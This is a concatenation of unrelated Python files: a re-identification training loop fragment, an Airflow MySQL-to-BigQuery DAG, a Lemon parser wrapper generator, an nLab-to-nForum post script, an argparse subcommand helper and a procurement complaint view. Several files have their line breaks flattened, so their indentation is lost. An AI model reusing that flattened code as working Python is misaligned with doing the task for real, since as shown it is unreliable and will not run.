cfg.DATALOADER.SAMPLER_PROB[0] != 0: src_loss = engine.state.metrics['src_loss']/cfg.DATALOADER.SAMPLER_PROB[0] else: src_loss = 0. if cfg.DATALOADER.SAMPLER_PROB[1] != 0: tgt_unsup_loss = engine.state.metrics['tgt_unsup_loss']/cfg.DATALOADER.SAMPLER_PROB[1] else: tgt_unsup_loss = 0. logger.info("Epoch[{}] Iter[{}/{}] src: {:.3f}, unsup: {:.3f}, lr: {:.2e}/{:.2e}" .format(engine.state.epoch, iter, len(alltrain_data_loader), src_loss, tgt_unsup_loss, scheduler.get_lr()[0],scheduler.get_lr()[-1])) # adding handlers using `trainer.on` decorator API @trainer.on(Events.EPOCH_COMPLETED) def print_times(engine): logger.info('Epoch {} done. Time per batch: {:.3f}[s] Speed: {:.1f}[samples/s]' .format(engine.state.epoch, timer.value() * timer.step_count, alltrain_data_loader.batch_size / timer.value())) logger.info('-' * 10) timer.reset() @trainer.on(Events.EPOCH_COMPLETED) def log_validation_results(engine): if engine.state.epoch % eval_period == 0: evaluator.run(val_data_loader) cmc, mAP = evaluator.state.metrics['r1_mAP'] logger.info("Validation Results - Epoch: {}".format(engine.state.epoch)) logger.info("mAP: {:.1%}".format(mAP)) for r in [1, 5, 10]: logger.info("CMC curve, Rank-{:<3}:{:.1%}".format(r, cmc[r - 1])) @trainer.on(Events.EPOCH_COMPLETED) def update_psolabels(engine): if engine.state.epoch % psolabel_period == 0: camstyle_target_unsupdata_loader = make_camstyle_target_unsupdata_loader(cfg) psolabel_producer.run(camstyle_target_unsupdata_loader) psolabels,cluster_acc,num = psolabel_producer.state.metrics['cluster'] logger.info("Cluster Acc: {:.3f}, classes: {} imgnum: {}".format(cluster_acc,len(set(psolabels))-1,num)) alltrain_data_loader, alltrain_camstyle_data_loader = make_camstyle_alltrain_data_loader(cfg, psolabels) camstyle_target_unsupdata_loader = make_camstyle_target_unsupdata_loader(cfg) psolabel_producer.run(camstyle_target_unsupdata_loader) psolabels,cluster_acc,num = psolabel_producer.state.metrics['cluster'] logger.info("Cluster Acc: {:.3f}, classes: {} imgnum: {}".format(cluster_acc,len(set(psolabels))-1,num)) alltrain_data_loader, alltrain_camstyle_data_loader = make_camstyle_alltrain_data_loader(cfg, psolabels) alltrain_loader_iter = cycle(alltrain_data_loader) alltrain_camstyle_loader_iter = cycle(alltrain_camstyle_data_loader) @trainer.on(Events.ITERATION_STARTED) def generate_batch(engine): current_iter = engine.state.iteration batch = next(alltrain_loader_iter) camstyle_batch = next(alltrain_camstyle_loader_iter) engine.state.batch = [batch, camstyle_batch] num_iters = len(alltrain_data_loader) data = list(range(num_iters)) trainer.run(data, max_epochs=epochs)
from datetime import timedelta

from airflow import DAG
from airflow.utils.dates import days_ago
from airflow.contrib.operators.mysql_to_gcs import MySqlToGoogleCloudStorageOperator
from airflow.contrib.operators.gcs_to_bq import GoogleCloudStorageToBigQueryOperator
from airflow.contrib.operators.bigquery_operator import BigQueryOperator

default_args = {
    'owner': 'rendy',
    'depends_on_past': False,
    'start_date': days_ago(2),
    'email': ['[email protected]'],
    'email_on_failure': False,
    'email_on_retry': False,
    'retries': 1,
    'retry_delay': timedelta(minutes=5),
}

bucket_name = 'rendy-test'  # change to your bucket name here
sales_filename = 'sales_export.json'
sales_schema_filename = 'sales_schema.json'

with DAG('devfest2020',
         schedule_interval=timedelta(days=1),
         default_args=default_args) as dag:

    extract = MySqlToGoogleCloudStorageOperator(
        task_id='extract',
        sql='SELECT * FROM test_db.sales_table st',  # change to your mysql table
        bucket=bucket_name,
        filename=sales_filename,
        schema_filename=sales_schema_filename,
        mysql_conn_id='devfest2020',  # change to your mysql connection id
    )

    load = GoogleCloudStorageToBigQueryOperator(
        task_id='load',
        destination_project_dataset_table='project.rendy_test.sales',  # change to your bq
        bucket=bucket_name,
        source_objects=[sales_filename],
        schema_object=sales_schema_filename,
        write_disposition='WRITE_TRUNCATE',
        create_disposition='CREATE_IF_NEEDED',
        source_format='NEWLINE_DELIMITED_JSON'
    )

    transform = BigQueryOperator(
        task_id='transform',
        sql="SELECT * REPLACE(REGEXP_REPLACE(cellphone, '[^0-9]', '') AS cellphone) "
            "FROM `project.rendy_test.sales`",
        use_legacy_sql=False,
        destination_dataset_table='project.rendy_test.sales_clean'  # change to your bq
    )

    extract >> load >> transform
#!/usr/bin/env python
import argparse
import sys

"""
This script generates a source file suitable for compilation. Because our
parser generator (Lemon) always outputs the same symbols, we need a way to
namespace them so that they don't clash.

The approach we use will leave the file as-is, but generate an include
wrapper, so that the symbols are changed before the actual source file is
included, and then compiled with the macro definition instead.

This script writes to stdout; the output may be captured and redirected to
another file.
"""

ap = argparse.ArgumentParser()
ap.add_argument('-p', '--prefix', help='Prefix for function names', required=True)
ap.add_argument('-i', '--include', help='Next-include for actual parser code',
                default='parser.c.inc')
options = ap.parse_args()
fp = sys.stdout

NAMES = (
    'Parse',
    'ParseTrace',
    'ParseAlloc',
    'ParseFree',
    'ParseInit',
    'ParseFinalize',
    'ParseStackPeack')

for name in NAMES:
    fp.write('#define {name} {prefix}_{name}\n'.format(name=name, prefix=options.prefix))

fp.flush()
fp.write('#include "{}"\n'.format(options.include))
fp.flush()
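# For a hypothetical invocation such as
#     python <this script> --prefix RSQuery
# the loop above would emit the following wrapper on stdout (the prefix is
# illustrative and the include name is the script's default; both lines are
# derived only from the format strings in this script):
#
#     #define Parse RSQuery_Parse
#     #define ParseTrace RSQuery_ParseTrace
#     #define ParseAlloc RSQuery_ParseAlloc
#     #define ParseFree RSQuery_ParseFree
#     #define ParseInit RSQuery_ParseInit
#     #define ParseFinalize RSQuery_ParseFinalize
#     #define ParseStackPeack RSQuery_ParseStackPeack
#     #include "parser.c.inc"
#
# Capturing that output to a .c file and compiling it in place of the raw
# Lemon output gives each parser its own prefixed symbol names.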
#!/usr/bin/python3.7 """ API for generating an nForum post following an nLab page edit --- To use, set up (if it is not already in place) a virtual environment as follows. python3 -m venv venv source venv/bin/activate pip3 install MySQLdb deactivate Once the virtual environment has been set up, to use the API, launch the virtual environment by running: source venv/bin/activate Then run the script as follows (it will not work if using the ./ syntax). python generate_nforum_post_from_nlab_edit.py --help This will describe the available options. As will be seen, there are two subcommands, 'create' and 'edit', whose descriptions can be obtained by running python generate_nforum_post_from_nlab_edit.py create --help or python generate_nforum_post_from_nlab_edit.py edit --help When finished, shut down the virtual environment by running: deactivate """ import argparse import datetime import logging import MySQLdb import os import sys import time import urllib.parse """ Initialises logging. Logs to nforum_announcer.log """ logger = logging.getLogger(__name__) logger.setLevel(logging.INFO) logging.Formatter.converter = time.gmtime logging_formatter = logging.Formatter( "%(asctime)s %(levelname)s %(name)s %(message)s") log_directory = os.environ["NLAB_LOG_DIRECTORY"] logging_file_handler = logging.FileHandler( os.path.join(log_directory, "nforum_announcer.log")) logging_file_handler.setFormatter(logging_formatter) logger.addHandler(logging_file_handler) class FailedToCarryOutQueryException(Exception): pass """ For a single database query """ def execute_single_with_parameters(query, parameters): database_user = os.environ["NLAB_DATABASE_USER"] database_password = os.environ["NLAB_DATABASE_PASSWORD"] database_name = os.environ["NLAB_DATABASE_NAME"] database_connection = MySQLdb.connect( user = database_user, password= database_password, db = database_name, charset = "utf8", use_unicode = True) cursor = database_connection.cursor() try: cursor.execute(query, parameters) results = cursor.fetchall() database_connection.commit() except MySQLdb.Error as e: logger.warning( "Failed to carry out the query " + query + " with parameters: " + str(parameters) + ". Error: " + str(e)) database_connection.rollback() raise FailedToCarryOutQueryException() finally: cursor.close() database_connection.close() return results """ For a transaction (list of database queries) """ def execute_with_parameters(queries_with_parameters): database_user = os.environ["NLAB_DATABASE_USER"] database_password = os.environ["NLAB_DATABASE_PASSWORD"] database_name = os.environ["NLAB_DATABASE_NAME"] database_connection = MySQLdb.connect( user = database_user, password= database_password, db = database_name, charset = "utf8", use_unicode = True) cursor = database_connection.cursor() try: for query, parameters in queries_with_parameters: cursor.execute(query, parameters) results = cursor.fetchall() database_connection.commit() cursor.close() except MySQLdb.Error as e: logger.warning( "Failed to carry out the query " + query + " with parameters: " + str(parameters) + ". 
Error: " + str(e)) database_connection.rollback() raise FailedToCarryOutQueryException() finally: database_connection.close() return results class _NoSuchWebException(Exception): pass def _address_of_web(web_id): query_results = execute_single_with_parameters( "SELECT address FROM webs WHERE id = %s", [ web_id ]) try: return query_results[0][0] except IndexError: raise _NoSuchWebException class NoNForumUserCorrespondingToNLabAuthorException(Exception): pass """ Finds the nForum user with the same 'Name' as an nLab author if there exists such a user (case insensitive). If there is no match or more than one match with 'Name', splits the nLab author at whitespace. If there are exactly two names after the split, tries to match these against FirstName and LastName. If this fails, tries to match against Names, joining the two names with an underscore. If this too fails, tries to find the nLab author in the author_to_user file. """ def nforum_user_id(nlab_author): user_id = None query_results = execute_single_with_parameters( "SELECT UserID FROM mathforge_user WHERE Name = %s", [nlab_author]) try: if len(query_results) <= 1: user_id = query_results[0][0] logger.info( "Successfully associated nLab author " + nlab_author + " to nForum user with UserID: " + str(user_id)) except IndexError: pass if user_id: try: return (user_id, _nforum_local_id(user_id)) except _NoLocalNForumUserCorrespondingToNLabAuthorException: user_id = None pass names = nlab_author.split() if len(names) == 2: query_results = execute_single_with_parameters( "SELECT UserID FROM mathforge_user " + "WHERE FirstName = %s AND LastName = %s", [names[0], names[1]]) try: if len(query_results) <= 1: user_id = query_results[0][0] logger.info( "Successfully associated nLab author " + nlab_author + " to nForum user with FirstName " + names[0] + " and LastName " + names[1] + ". UserID: " + str(user_id)) except IndexError: pass if user_id: try: return (user_id, _nforum_local_id(user_id)) except _NoLocalNForumUserCorrespondingToNLabAuthorException: user_id = None pass names_joined_with_underscore = names[0] + "_" + names[1] query_results = execute_single_with_parameters( "SELECT UserID FROM mathforge_user " + "WHERE Name = %s", [names_joined_with_underscore]) try: if len(query_results) <= 1: user_id = query_results[0][0] logger.info( "Successfully associated nLab author " + nlab_author + " to nForum user " + names_joined_with_underscore + ". UserID: " + str(user_id)) except IndexError: pass if user_id: try: return (user_id, _nforum_local_id(user_id)) except _NoLocalNForumUserCorrespondingToNLabAuthorException: user_id = None pass author_to_user_filename = os.environ["NLAB_AUTHOR_TO_USER_FILE"] with open(author_to_user_filename, "r") as author_to_user_file: for line in author_to_user_file: author_and_user = line.split(",") number_of_columns = len(author_and_user) if (number_of_columns > 2) or (number_of_columns < 2): logger.warning( "Syntax error in author_to_user file at the following " + "line: " + line) else: author = author_and_user[0].strip() if author == nlab_author: user = author_and_user[1].strip() query_results = execute_single_with_parameters( "SELECT UserID FROM mathforge_user " + "WHERE Name = %s", [user]) try: if len(query_results) <= 1: user_id = query_results[0][0] logger.info( "Successfully associated nLab author " + nlab_author + " to nForum user " + user + " using the author_to_user file. 
UserID: " + str(user_id)) except IndexError: pass if user_id: try: return (user_id, _nforum_local_id(user_id)) except _NoLocalNForumUserCorrespondingToNLabAuthorException: user_id = None pass break logger.info( "Did not find nForum user corresponding to nLab author: " + nlab_author) raise NoNForumUserCorrespondingToNLabAuthorException() class _NoLocalNForumUserCorrespondingToNLabAuthorException(Exception): pass """ Finds the LocalID corresponding to a UserID """ def _nforum_local_id(user_id): query_results = execute_single_with_parameters( "SELECT LocalID FROM mathforge_nforum_User WHERE UserID = %s", [user_id]) try: local_id = query_results[0][0] logger.info( "Successfully looked up nForum LocalID " + str(local_id) + " to nForum UserID: " + str(user_id)) return local_id except IndexError: logger.info( "No LocalID for nForum user with UserID: " + str(user_id)) raise _NoLocalNForumUserCorrespondingToNLabAuthorException() class UnableToDetermineRevisionNumberException(Exception): pass def revision_number(nlab_page_id): query_results = execute_single_with_parameters( "SELECT COUNT(id) FROM revisions WHERE page_id = %s", [nlab_page_id]) try: revision_number = query_results[0][0] logger.info( "Successfully found revision number for nLab page with ID " + str(nlab_page_id) + " to be: " + str(revision_number)) return revision_number except IndexError: logger.warning( "Unable to determine revision number for nLab page with ID: " + str(nlab_page_id)) raise UnableToDetermineRevisionNumberException() class NoExistingDiscussionException(Exception): pass def _latest_changes_category_id(latest_changes_web_name): category_name = "- " + latest_changes_web_name + ": Latest Changes" query_results = execute_single_with_parameters( "SELECT CategoryID FROM mathforge_nforum_Category " + "WHERE Name = %s", [category_name]) try: return query_results[0][0] except IndexError: return 5 """ Finds the DiscussionID of the last used forum thread whose name is that of the nLab page. The search is case insensitive. """ def latest_forum_discussion_id(nlab_page_name, latest_changes_web_name): latest_changes_category_id = _latest_changes_category_id( latest_changes_web_name) query_results = execute_single_with_parameters( "SELECT DiscussionID FROM mathforge_nforum_Discussion " + "WHERE Name = BINARY %s " + "AND CategoryID = %s " + "ORDER BY DateLastActive DESC " + "LIMIT 1", [nlab_page_name, latest_changes_category_id]) try: return query_results[0][0] except IndexError: raise NoExistingDiscussionException() class _ForumPostParameters: _nlab_edit_announcer_user_id = 1691 _nlab_edit_announcer_local_user_id = 693 def __init__( self, nlab_page_name, latest_changes_web_name, web_id, user_id, local_id): self.nlab_page_name = nlab_page_name self.latest_changes_web_name = latest_changes_web_name self.web_id = web_id self.user_id = user_id self.local_id = local_id """ Creates discussion in the nForum in the 'Latest changes' category whose name is the same (case insensitive) as the nLab page. Posts an announcement of the nLab page to the nForum as the first comment in this discussion. 
""" def create_discussion_and_post_to_it(self, announcement): latest_changes_category_id = _latest_changes_category_id( self.latest_changes_web_name) query_with_parameters_one = ( "INSERT INTO mathforge_nforum_Discussion (" + "AuthUserID, Name, DateCreated, CategoryID) " + "VALUES (%s, %s, NOW(), %s)", [self.user_id, self.nlab_page_name, latest_changes_category_id]) query_with_parameters_two = ( "SET @discussion_id = LAST_INSERT_ID()", []) query_with_parameters_three = ( "INSERT INTO mathforge_nforum_Comment (" + "DiscussionID, AuthUserID, DateCreated, Body, FormatType) " + "VALUES (@discussion_id, %s, NOW(), %s, %s)", [self.user_id, announcement, "MarkdownItex"]) query_with_parameters_four = ( "SET @comment_id = LAST_INSERT_ID()", []) query_with_parameters_five = ( "UPDATE mathforge_nforum_Discussion " + "SET CountComments = 1, " + "DateLastActive = NOW(), " + "FirstCommentID = @comment_id, " + "LastUserID = %s " + "WHERE DiscussionID = @discussion_id", [self.user_id]) query_with_parameters_six = ( "UPDATE mathforge_nforum_User " + "SET CountComments = CountComments + 1, " + "DateLastActive = NOW() " + "WHERE LocalID = %s;", [self.local_id]) queries_with_parameters = [ query_with_parameters_one, query_with_parameters_two, query_with_parameters_three, query_with_parameters_four, query_with_parameters_five, query_with_parameters_six] execute_with_parameters(queries_with_parameters) """ Posts announcement to nForum when there is an existing discussion in the 'Latest changes' category with the same name (case insensitive) as the nLab page. """ def post_to_existing_discussion( self, discussion_id, announcement): query_with_parameters_one = ( "INSERT INTO mathforge_nforum_Comment (" + "DiscussionID, AuthUserID, DateCreated, Body, FormatType) " + "VALUES (%s, %s, NOW(), %s, %s)", [discussion_id, self.user_id, announcement, "MarkdownItex"]) query_with_parameters_two = ( "UPDATE mathforge_nforum_Discussion " + "SET CountComments = CountComments + 1, " + "DateLastActive = NOW(), " + "LastUserID = %s " + "WHERE DiscussionID = %s", [self.user_id, discussion_id]) query_with_parameters_three = ( "UPDATE mathforge_nforum_User " + "SET CountComments = CountComments + 1, " + "DateLastActive = NOW() " + "WHERE LocalID = %s", [self.local_id]) queries_with_parameters = [ query_with_parameters_one, query_with_parameters_two, query_with_parameters_three ] execute_with_parameters(queries_with_parameters) """ Posts announcement to nForum when there is an existing discussion in the 'Latest changes' category with the same name (case insensitive) as the old name of an nLab page whose name has been changed, and changes the name of the discussion to the new name of the nLab page. 
""" def post_to_existing_discussion_with_name_change( self, discussion_id, announcement): query_with_parameters_one = ( "UPDATE mathforge_nforum_Discussion " + "SET Name = %s " + "WHERE DiscussionID = %s", [self.nlab_page_name, discussion_id]) query_with_parameters_two = ( "INSERT INTO mathforge_nforum_Comment (" + "DiscussionID, AuthUserID, DateCreated, Body, FormatType) " + "VALUES (%s, %s, NOW(), %s, %s)", [discussion_id, self.user_id, announcement, "MarkdownItex"]) query_with_parameters_three = ( "UPDATE mathforge_nforum_Discussion " + "SET CountComments = CountComments + 1, " + "DateLastActive = NOW(), " + "LastUserID = %s " + "WHERE DiscussionID = %s", [self.user_id, discussion_id]) query_with_parameters_four = ( "UPDATE mathforge_nforum_User " + "SET CountComments = CountComments + 1, " + "DateLastActive = NOW() " + "WHERE LocalID = %s", [self.local_id]) queries_with_parameters = [ query_with_parameters_one, query_with_parameters_two, query_with_parameters_three, query_with_parameters_four ] execute_with_parameters(queries_with_parameters) class _CreateForumPostParameters(_ForumPostParameters): def __init__( self, nlab_page_name, latest_changes_web_name, web_id, user_id, local_id, author, announcement): super().__init__( nlab_page_name, latest_changes_web_name, web_id, user_id, local_id) self.author = author if announcement is not None: self.announcement = announcement.strip() else: self.announcement = None """ Comment body for announcing a page creation """ def nforum_announcement(self, found_nforum_user): if not self.announcement: announcement = ( "Page created, but author did not leave any comments.") else: announcement = self.announcement if not found_nforum_user: announcement += ( "\n\n" + self.author) announcement += ( "\n\n" + ", ".join(self.page_links())) return announcement def page_links(self): url_encoded_page_name = urllib.parse.quote_plus(self.nlab_page_name) web_address = _address_of_web(self.web_id) version = ( '<a href="https://ncatlab.org/' + web_address + '/revision/' + url_encoded_page_name + '/' + str(1) + '">v' + str(1) + '</a>') current = ( '<a href="https://ncatlab.org/' + web_address + '/show/' + url_encoded_page_name + '">current</a>') return (version, current) class _EditForumPostParameters(_ForumPostParameters): def __init__( self, nlab_page_name, latest_changes_web_name, web_id, user_id, local_id, author, announcement, page_id): super().__init__( nlab_page_name, latest_changes_web_name, web_id, user_id, local_id) self.author = author if announcement is not None: self.announcement = announcement.strip() else: self.announcement = None self.page_id = page_id """ See if there is an existing nForum discussion thread in the 'Latest changes' category with the same title as the edited nLab page, and post the announcement to this thread if so. If there is more than one, choose the last used. If there is no such thread, create one and post to it. 
""" def post(self, found_nforum_user): try: discussion_id = latest_forum_discussion_id( self.nlab_page_name, self.latest_changes_web_name) self.post_to_existing_discussion( discussion_id, self.nforum_announcement(found_nforum_user)) except NoExistingDiscussionException: forum_post_parameters = _ForumPostParameters( self.nlab_page_name, self.latest_changes_web_name, self.web_id, self.user_id, self.local_id) forum_post_parameters.create_discussion_and_post_to_it( self.nforum_announcement(found_nforum_user)) def post_with_name_change(self, found_nforum_user, old_page_name): try: discussion_id = latest_forum_discussion_id( old_page_name, self.latest_changes_web_name) self.post_to_existing_discussion_with_name_change( discussion_id, self.nforum_announcement(found_nforum_user)) logger.info( "Successfully changed the title of nForum " + "discussion from " + old_page_name + " to " + self.nlab_page_name) except NoExistingDiscussionException: forum_post_parameters = _ForumPostParameters( self.nlab_page_name, self.latest_changes_web_name, self.web_id, self.user_id, self.local_id) forum_post_parameters.create_discussion_and_post_to_it( self.nforum_announcement(found_nforum_user)) """ Comment body for announcing a page edit """ def nforum_announcement(self, found_nforum_user): if not self.announcement: announcement = ( "Non-trivial edit made, but author did not leave any comments.") else: announcement = self.announcement if not found_nforum_user: announcement += ( "\n\n" + self.author) announcement += ( "\n\n" + ", ".join(self.page_links())) return announcement def page_links(self): url_encoded_page_name = urllib.parse.quote_plus(self.nlab_page_name) web_address = _address_of_web(self.web_id) revision_number_for_edit = revision_number(self.page_id) version = ( '<a href="https://ncatlab.org/' + web_address + '/revision/' + url_encoded_page_name + '/' + str(revision_number_for_edit) + '">v' + str(revision_number_for_edit) + '</a>') current = ( '<a href="https://ncatlab.org/' + web_address + '/show/' + url_encoded_page_name + '">current</a>') if revision_number_for_edit > 1: diff = ( '<a href="https://ncatlab.org/' + web_address + '/revision/diff/' + url_encoded_page_name + '/' + str(revision_number_for_edit) + '">diff</a>') return (diff, version, current) return (version, current) """ Sets up the command line argument parsing """ def argument_parser(): parser = argparse.ArgumentParser( description = "Announces an nLab edit on the nForum") subparsers = parser.add_subparsers(dest="subcommand") parser_create_page = subparsers.add_parser( "create", help = "Announces an nLab page creation on the nForum, creating a " + "new nForum discussion in the 'Latest Changes' category with the " + "same title as the created nLab page, and posting an announcement to " + "it.") parser_edit_page = subparsers.add_parser( "edit", help = "Announces an nLab page edit on the nForum. If it is not a " "trivial edit, finds the latest nForum discussion in the " + "'Latest Changes' category with the same name as the edited nLab " + "page and posts an announcement to it, or creates a new discussion " + "in this category with this title if it does not already exist, and " + "posts an announcement to it. If it is a trivial edit, only logs " + "it. 
If the edit involves a change of name of the nLab page and a " + "discussion on the nForum with the same title as the old name of the " + "nLab page exists, changes the title of the discussion to the new " + "name of the page.") parser_create_page.add_argument( "nlab_page_name", help = "Name of created nLab page") parser_create_page.add_argument( "latest_changes_web_name", help = ( "Name of web to which the created nLab page belongs, as " + "displayed in the nForum latest changes category name")) parser_create_page.add_argument( "web_id", help = "ID of web to which the created nLab page belongs") parser_create_page.add_argument( "announcement", help = "Comments on the created nLab page") parser_create_page.add_argument( "author", help = "Author of the created nLab page") parser_edit_page.add_argument( "nlab_page_name", help = "Name of edited nLab page. If the edit involves a change " + "in the name of the page, this should be the new name of the " + "page") parser_edit_page.add_argument( "latest_changes_web_name", help = ( "Name of web to which the edited nLab page belongs, as " + "displayed in the nForum latest changes category name")) parser_edit_page.add_argument( "web_id", help = "ID of web to which the edited nLab page belongs") parser_edit_page.add_argument( "announcement", help = "Comments on the edited nLab page") parser_edit_page.add_argument( "author", help = "Author of the edited nLab page") parser_edit_page.add_argument( "page_id", help = "ID of the edited nLab page") parser_edit_page.add_argument( "-o", "--old_page_name", help = ( "Old page name for the edited nLab page if the edit involves " + "a name change")) parser_edit_page.add_argument( "--is_trivial", action = "store_true", help = "Indicate that the edit was trivial") return parser def main(): parser = argument_parser() arguments = parser.parse_args() nlab_page_name = arguments.nlab_page_name latest_changes_web_name = arguments.latest_changes_web_name web_id = arguments.web_id announcement = arguments.announcement author = arguments.author failure_message = None try: user_id, local_id = nforum_user_id(author) found_nforum_user = True except NoNForumUserCorrespondingToNLabAuthorException: user_id = _ForumPostParameters._nlab_edit_announcer_user_id local_id = _ForumPostParameters._nlab_edit_announcer_local_user_id found_nforum_user = False if arguments.subcommand == "create": forum_post_parameters = _CreateForumPostParameters( nlab_page_name, latest_changes_web_name, web_id, user_id, local_id, author, announcement) try: forum_post_parameters.create_discussion_and_post_to_it( forum_post_parameters.nforum_announcement(found_nforum_user)) logger.info( "Successfully made nForum discussion for newly created nLab " + "page with name: " + nlab_page_name + ". Author: " + author + ". Web id: " + str(web_id)) except FailedToCarryOutQueryException: logger.warning( "Due to a database error, could not make nForum discussion " + "for newly created nLab page with name: " + nlab_page_name + ". Author: " + author + ". Web id: " + str(web_id) + ". Announcement: " + announcement) failure_message = "Failed to make nForum discussion" except Exception as e: logger.warning( "Due to an unforeseen error, could not make nForum " + "discussion for newly created nLab page with name: " + nlab_page_name + ". Author: " + author + ". Web id: " + str(web_id) + ". Announcement: " + announcement + ". 
Error: " + str(e)) failure_message = "Failed to make nForum discussion" else: if arguments.is_trivial: logger.info( "Trivial edit made to " + arguments.nlab_page_name + " in web with id " + str(web_id) + " by " + author + " at " + str(datetime.datetime.utcnow().replace(microsecond=0)) + " UTC") return forum_post_parameters =_EditForumPostParameters( nlab_page_name, latest_changes_web_name, web_id, user_id, local_id, author, announcement, arguments.page_id) old_page_name = arguments.old_page_name try: if old_page_name: forum_post_parameters.post_with_name_change( found_nforum_user, old_page_name) logger.info( "Successfully made nForum post for newly edited nLab " + "page with name: " + nlab_page_name + ". Author: " + author + ". Web id: " + str(web_id)) else: forum_post_parameters.post(found_nforum_user) logger.info( "Successfully made nForum post for newly edited nLab " + "page with name: " + nlab_page_name + ". Author: " + author + ". Web id: " + str(web_id)) except FailedToCarryOutQueryException: log_message = ( "Due to a database error, could not make nForum post for " + "newly edited nLab page with name: " + nlab_page_name + ". Author: " + author + ". Web id: " + str(web_id)) if old_page_name: log_message = log_message + ( ". Change of page name from " + old_page_name + " to " + nlab_page_name) log_message = log_message + ( ". Announcement: " + announcement) logger.warning(log_message) overall_failure_message = ( "Failed to make nForum post to the discussion for the " + "edited nLab page") except Exception as e: log_message = ( "Due to an unforeseen error, could not make nForum post for " + "newly edited nLab page with name: " + nlab_page_name + ". Author: " + author + ". Web id: " + str(web_id)) if old_page_name: log_message = log_message + ( ". Change of page name from " + old_page_name + " to " + nlab_page_name) log_message = log_message + ( ". Announcement: " + announcement + " Error: " + str(e)) logger.warning(log_message) failure_message = ( "Failed to make nForum post to the discussion for the " + "edited nLab page") if failure_message is not None: sys.exit(failure_message) if __name__ == "__main__": main()
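# Example invocations (all argument values illustrative), matching the
# subcommands defined in argument_parser() above:
#
#   python generate_nforum_post_from_nlab_edit.py create \
#       "some page" "nLab" 1 "Created the page with a stub Idea section." "Some Author"
#
#   python generate_nforum_post_from_nlab_edit.py edit \
#       "some page" "nLab" 1 "Expanded the References section." "Some Author" 12345 \
#       --old_page_name "some old page"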
from argparse import ArgumentParser # noinspection PyProtectedMember class CommandParser(ArgumentParser): def __init__( self, name=None, aliases=None, py_function=None, subcommands=None, short_description=None, **kwargs ): self.name = name if isinstance(aliases, str): aliases = [aliases] self.aliases = [] if aliases is None else aliases self.py_function = py_function if subcommands is None: subcommands = [] elif not hasattr(subcommands, '__iter__'): subcommands = [subcommands] self.subcommands = subcommands # if a short description isn't provided, # use the default description (if that was provided) if short_description is None: short_description = kwargs.get('description') self.short_description = short_description self.subcommand_parsers = None self._default_subcommand = None super().__init__(**kwargs) # set correct usage info for subcommands for cmd in self.subcommands: cmd.prog = f"{self.prog} {cmd.name}" def __eq__(self, other): return other in self.all_names @property def all_names(self): return (self.name, *self.aliases) @property def default_subcommand(self): return self._default_subcommand @default_subcommand.setter def default_subcommand(self, cmd): if cmd not in self.subcommands: raise ValueError("default subcommand must be an available subcommand") self._default_subcommand = self.subcommands[self.subcommands.index(cmd)] @default_subcommand.getter def get_default_subcommand(self): if self._default_subcommand is not None: return self._default_subcommand else: raise ValueError("default subcommand not set") @staticmethod def _format_subcmd_help(cmd, formatter): # determine the required width and the entry label help_position = min(formatter._action_max_length + 2, formatter._max_help_position) help_width = max(formatter._width - help_position, 11) cmd_width = help_position - formatter._current_indent - 2 cmd_header = cmd_str = ', '.join(cmd.all_names) tup = formatter._current_indent, '', cmd_width, cmd_header cmd_header = '%*s%-*s ' % tup indent_first = 0 # add lines of help text (from cmd.short_description) help_text = cmd.short_description help_lines = formatter._split_lines(help_text, help_width) parts = [cmd_header] parts.append('%*s%s\n' % (indent_first, '', help_lines[0])) for line in help_lines[1:]: parts.append('%*s%s\n' % (help_position, '', line)) return formatter._join_parts(parts) def format_help(self): # overrides argparse.ArgumentParser's `format_help` function to # include subcommand info with custom help formatting formatter = self._get_formatter() # format usage formatter.add_usage( self.usage, self._actions, self._mutually_exclusive_groups ) # format description formatter.add_text(self.description) # add existing groups first (in this case, "optional arguments") for action_group in self._action_groups: formatter.start_section(action_group.title) formatter.add_text(action_group.description) formatter.add_arguments(action_group._group_actions) formatter.end_section() # SUBCOMMAND CUSTOM HELP FORMATTING if any(self.subcommands): formatter.start_section("commands") for cmd in self.subcommands: cmd_str = ', '.join(cmd.all_names) cmd_len = len(cmd_str) + formatter._current_indent formatter._action_max_length = max(formatter._action_max_length, cmd_len) formatter._add_item(self._format_subcmd_help, (cmd, formatter)) formatter.end_section() # format epilogue section formatter.add_text(self.epilog) # format full help output return formatter.format_help() def run(self, raw_args): try: cmd = raw_args[0] except IndexError: # no positional or optional args were passed try: # 
use the default subcommand cmd = self.get_default_subcommand except ValueError: # no default subcommand set cmd = None try: # Pass remaining args to the subcommand's CommandParser # (prevents argparse from consuming args meant for # subcommands like `--help/-h`) subcmd = self.subcommands[self.subcommands.index(cmd)] subcmd.run(raw_args[1:]) except ValueError: # the args either belong to the present command or are invalid parsed_args = self.parse_args(raw_args) self.py_function(**vars(parsed_args))
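# Minimal usage sketch (the "hello" command and greet() handler are
# hypothetical, not part of this module): a top-level CommandParser with one
# subcommand, dispatched through run().
if __name__ == "__main__":
    def greet(name):
        # Handler wired to the subcommand via `py_function`.
        print(f"hello, {name}")

    hello = CommandParser(
        name="hello",
        py_function=greet,
        short_description="greet someone by name",
    )
    hello.add_argument("name")

    cli = CommandParser(name="cli", prog="cli", subcommands=[hello])
    cli.run(["hello", "world"])  # dispatches to greet(): prints "hello, world"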
# -*- coding: utf-8 -*- from openprocurement.tender.core.views.complaint import BaseTenderComplaintResource from openprocurement.api.utils import get_now from openprocurement.tender.core.utils import optendersresource from openprocurement.tender.openua.validation import validate_update_claim_time from openprocurement.tender.openuadefense.validation import validate_submit_claim_time @optendersresource( name="aboveThresholdUA.defense:Tender Complaints", collection_path="/tenders/{tender_id}/complaints", path="/tenders/{tender_id}/complaints/{complaint_id}", procurementMethodType="aboveThresholdUA.defense", description="Tender complaints", ) class TenderUaComplaintResource(BaseTenderComplaintResource): patch_check_tender_excluded_statuses = ( "draft", "claim", "answered", "pending", "accepted", "stopping", ) @staticmethod def validate_submit_claim_time_method(request): return validate_submit_claim_time(request) @staticmethod def validate_update_claim_time_method(request): return validate_update_claim_time(request) def pre_create(self): complaint = self.request.validated["complaint"] if complaint.status == "claim": self.validate_submit_claim_time_method(self.request) elif complaint.status == "pending": self.validate_submit_claim_time_method(self.request) complaint.dateSubmitted = get_now() complaint.type = "complaint" else: complaint.status = "draft" return complaint
